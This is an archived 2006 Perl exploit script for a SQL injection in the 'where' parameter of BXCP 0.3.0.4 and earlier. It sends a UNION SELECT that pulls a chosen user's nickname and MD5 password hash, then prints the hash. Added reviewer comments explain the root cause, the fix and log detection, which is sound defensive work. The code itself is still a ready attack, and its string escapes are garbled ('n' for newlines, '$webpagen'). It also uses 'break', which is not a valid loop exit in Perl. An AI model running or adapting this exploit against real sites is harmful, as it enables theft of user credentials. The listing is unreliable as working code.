
# Title : BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit
# Published : 2006-07-02
# Author : x23


#!/usr/bin/perl

use IO::Socket;

# Print the usage banner.  The q{} text documents the three positional
# arguments the script expects (server, dir, id) and shows a sample run.
print q{
-------------------------------------------------------------------------------------
BXCP exploit by x23 ~ curse-crew.de ~ geekbar.cx.la ~ geeknet.uttx.net
use: bxcp.pl [server] [dir] [id]
sample:
$ perl bxcp.pl bxcp.com / 1
~ connecting
~ exploiting
~ hash: *censored* ;D
-------------------------------------------------------------------------------------

};

# Read the three positional arguments: host name, application directory and
# the numeric user id whose row the query selects.  None of them is validated
# or URL-encoded before it is placed in the request.
$webpage =   $ARGV[0];
$directory = $ARGV[1];
$vic_id =    $ARGV[2];

# Stop when the third argument is missing or false (an id of 0 also fails
# this test).
# NOTE(review): the trailing "n" in this and the later string literals looks
# like an escape sequence whose backslash was lost when the page was archived;
# treat the listing as a record of the request shape, not as exact code.
if (!$vic_id) { die "~ read how to use ;)n"; }

# Build the request target.  The SQL fragment travels in the `where`
# parameter of index.php?mod=files&action=view: the value -1 is followed by a
# UNION SELECT that places users_nick and users_pwd from the {pre}_users
# table into the result (padded with constant 0 columns), filtered by the
# supplied users_id.
#
# Defender notes:
#  - Root cause (per the page title): `where` reaches a SQL statement without
#    being constrained to an integer.  The server-side fix is an integer cast
#    or a bound parameter; the vulnerable PHP is not shown on this page.
#  - Affected range given by the title: BXCP up to and including 0.3.0.4.
#  - Detection: access-log entries for mod=files&action=view whose `where=`
#    value contains UNION, SELECT or _users instead of a plain number.
#  - `{pre}` is sent literally; presumably the application expands it to its
#    table prefix -- verify against the BXCP source.
$get = "http://".$webpage.$directory."index.php?mod=files&action=view&where=-1+UNION+";
$get .= "SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=";
$get .= $vic_id;

# Open a plain TCP connection to port 80 of the given host and write a
# hand-built HTTP/1.1 GET request to it; the script dies if the connection
# cannot be made.
#
# Detection pivots visible in this request:
#  - the request line carries an absolute URI ($get starts with "http://"),
#    which is unusual for traffic sent directly to an origin server;
#  - the User-Agent is a fixed Firefox 1.5.0.4 / Windows NT 5.1 / "de" string.
# NOTE(review): as archived, "$webpagen" on the Host line reads as a different,
# unset variable -- a symptom of the lost backslashes on this page.
print "~ connectingn";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage",
PeerPort=>"80") || die "[+] Can't connect to Servern";
print "~ exploitingn";
print $sock "GET $get HTTP/1.1n";
print $sock "Host: $webpagen";
print $sock "Accept: */*n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4n";
print $sock "Connection: closenn";

# Read the response line by line and print the first run of 32 lowercase hex
# characters that matches the pattern below.
#
# Defender notes:
#  - 32 hex characters is the length of an MD5 digest; presumably users_pwd
#    holds an unsalted MD5 of the password -- confirm against the schema.
#  - After patching, treat every stored hash as exposed: force password
#    resets and move to a salted, slow password hash.
# NOTE(review): `break` is not Perl's loop-exit keyword (`last` is); what it
# does here depends on the Perl version -- verify.
while ($answer = <$sock>) {
  #print $answer;
  if ($answer =~ /([0-9a-f]{32})n/) {
     print "~ hash: $1n";
     break;
  }
}

close($sock);

# www.Syue.com [2006-07-02]